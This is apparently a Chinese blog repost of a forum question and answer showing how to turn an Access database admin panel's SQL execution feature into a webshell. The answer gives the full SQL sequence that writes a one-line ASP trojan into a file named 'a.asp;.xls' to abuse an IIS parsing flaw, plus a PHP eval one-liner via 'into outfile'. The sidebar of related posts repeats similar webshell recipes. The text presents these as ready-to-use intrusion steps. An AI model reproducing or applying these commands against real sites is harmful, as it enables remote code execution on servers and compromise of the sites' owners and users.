ACCESS数据库后台sql语句执行导webshell

最新推荐文章于 2024-07-31 19:38:21 发布
最新推荐文章于 2024-07-31 19:38:21 发布
阅读量653 收藏
点赞数
文章标签: access 数据库 sql excel table cmd

http://www.cqzh.cn/post/414.html

 

问:

一个垃圾论坛,access数据库,无其他可利用之处,不过有个sql语句执行功能,绝对路径也知道,小弟对sql语句不懂,记得如果是mysql数据库root权限可以导出SHELL,这个是否也能导出shell呢?需要什么条件,语句又是什么?网上翻不到资料。麻烦各位。

答:

create table cmd (a varchar(50))
insert into cmd (a) values ('<%execute request("a")%>')
select * into [a] in 'f:/host/qhdyxt/web/a.asp;.xls' 'excel 4.0;' from cmd
drop table cmd

解释如下:
1.create table a (a varchar(50)) 建立一个有一个A字段的表 表名为a 字段类型为字符 长度为50
2.insert into a (a) values ('<%execute request("a")%>') 在表a的a字段插入密码为a的一句话木马
3.select * into [a] in 'F:/jt/work/a.asp;.xls' 'excel 4.0;' from a 把表a的内容导出为物理路径的一个
EXCEL文件,为什么用excel文件,因为ACCESS数据库不允许导出其他危险格式。我们导出为EXCEL后在利用IIS解析漏洞就可以变成我们的小马了。很*的说~~
4.drop table a 丢家伙闪人 射完就走!

小弟的提问,没两分钟大家就回答了,强烈顶t00ls牛淫。

这个更简单:

Access利用后台SQL执行命令功能导出WebShell:
SELECT '<%execute request("a")%>' into [vote] in 'd:/web/x.asp;.xls' 'excel 8.0;' from vote

或者Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';
后台提供SQL执行功能且知道绝对路径方可使用(vote为已知表段)

 

asli33
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
access webshell
blogfeifei
08-22 138
create table cmd(shell text) insert into cmd (shell) values('&lt;%execute request(1)%&gt;') SELECT shell into [fuck] in 'D:\web\me\backdoorx\asp.asp;x.xls' 'EXCEL 4.0;'from cmd
ACCESS执行SQL语句出一句话拿webshell
eldn__的专栏
12-21 6718
实用环境,在access后台其他方法不能拿到webshell 但是后台SQL语句查询执行,就可以直接access出一句话拿webshell了 不过需要知道物理路径才能出,利用IIS的解析漏洞EXCEL文件拿到webshell,因为ACCESS数据库不允许出其他危险格式。 至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。 逐一执行以下语句就可以出一句话了
SQL注入AccessWebShell 返回
默瓜哥哥----默默的傻瓜
07-25 1705
<br />目前有一种在ACCESS数据库Webshell的方法,这个方法是由lake2兄弟提出来的,下面就是我引用他这篇文章的原文:<br />已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。<br />最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access出asp的方法,分享之。<br />几个月之前网上就流传利用SQL注入Access数据库内容到文本文件(可出txt、htm、html等
SQL注入AccessWebShell
weixin_33787529的博客
01-25 139
from:lake2's blog 已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。 最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access出asp的方法,分享之。 几个月之前网上就流传利用SQL注入Access数据库内容到文本文件(可出txt、htm、htm...
Access数据库SQL注入攻防技术研究 (1).pdf
09-19
SQL注入攻击的原理是攻击者通过在网页表单或URL请求中嵌入恶意SQL语句,使得数据库服务器执行非预期的操作,从而获取敏感信息,甚至控制整个服务器。例如,攻击者可能利用漏洞构造查询,绕过认证,篡改或删除数据,...
网站后台Webshell
01-13
通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后,寻找后台漏洞上传网页后门,获取网站的webshell webshell的作用是方便攻击者,webshell是拥有fso权限,根据fso权限的不用,可以对...
ACCESS一句话拿webshell1
08-08
在本文中,我们将探讨一种利用ACCESS数据库出功能来植入Webshell的方法,这种方法被称为"ACCESS一句话拿webshell1"。Webshell是一种后门程序,常用于远程控制被黑网站,执行恶意操作。此技术主要针对使用ACCESS...
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员...
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
Webshell可以提供命令执行、文件操作、数据库管理等功能,使攻击者能够绕过常规的安全防护措施。案例中,通过"态势感知"服务发现了异常的PHP文件,这些文件可能是攻击者留下的Webshell,用于进一步的操作。 【WAF...
MySQL/ACCESS出一句话拿WebShell后门命令
weixin_34040079的博客
12-23 222
MySQL:Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES(<? php eval($_POST[cmd]);?>); //把一句话***插入到temp表Se...
select into outfile access deny问题
wangqiaowqo的专栏
08-30 280
为应用建立了rnd的帐号,专门为他们查询线上数据库用的,当然,只有他们上了生产网络以后才能连上数据库,安全方面我们还是很注意的,呵呵。 授权的语句如下: grant select on armory.* to rnd; flush privileges; select查询数据没有问题,但是有的用户有了更多的需求,他想把数据出来,简单的处理的话,可以用select into outfi...
命令执行webshell&中国菜刀
zh的博客
10-14 644
靶场地址:http://www.whalwl.xyz:8013 解题准备:了解webshell的基本原理,以及连接数据库的参数定义 解题思路: 1、进入网站,直接告诉了webshell地址和连接密码 2、使用中国蚁剑,连接成功。 3、进入文件管理,一共四个文件,从init.php得到数据库配置信息 4、 手动连接数据库 5、填写数据库配置,测试连接成功,添加! 6、从数据库中找到flag。 ...
数据库命令执行Getshell
m0_53087192的博客
01-19 930
AccessAccess出xxx等文件需要配合解析漏洞 create table cmd (a varchar(50)); insert into cmd (a) values ('一句话木马') #一句话木马如:<%execute request(1)%> select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd drop table cmd 菜刀直连https://www.xxx.c
asp写入mysqlshell_拿webshell方法总结
weixin_39700063的博客
12-20 508
一、直接上传获得webshell这种对php和jsp的一些程序比较常见,MolyXBOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blog后台可以可以直接上传.php文件,上传的文...
mysql如何输出一句话_MySQL/ACCESS出一句话拿WebShell后门命令
weixin_39778400的博客
01-19 1269
MySQL:Drop TABLE IF EXISTS temp; //如果存在temp就删掉Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段Insert INTO temp (cmd) VALUES( php eval($_POST[cmd]);?>); //把一句话***插入到temp表Select cmd from te...
ACCESS出一句话拿webshell
jihaichen的博客
05-04 1104
第一句代码create table cmd (a varchar(50))  第二句代码insert into cmd (a) values ('一句话木马')  第三句代码select * into [a] in 'e:\host\chouwazi.com\web\data\xiao.asp;xiao.xls' 'excel 4.0;' from cmd  第四句代码drop table cmd...
简单的 mongoDB 学习
qq_19342829的博客
07-31 491
mongodb入门学习整理
社区养老服务小程序的设计
最新发布
Karen198的博客
07-31 509
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
渗透测试实战:社工取密、SQL注入与Webshell提权
2. **SQL注入(SQL Injection)**:这是一种常见的网络安全攻击方式,攻击者通过输入恶意的SQL语句来操纵数据库。文中提到尝试通过枚举用户名并结合SQL注入规则来获取更多数据。 3. **Webshell**:Webshell是攻击者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值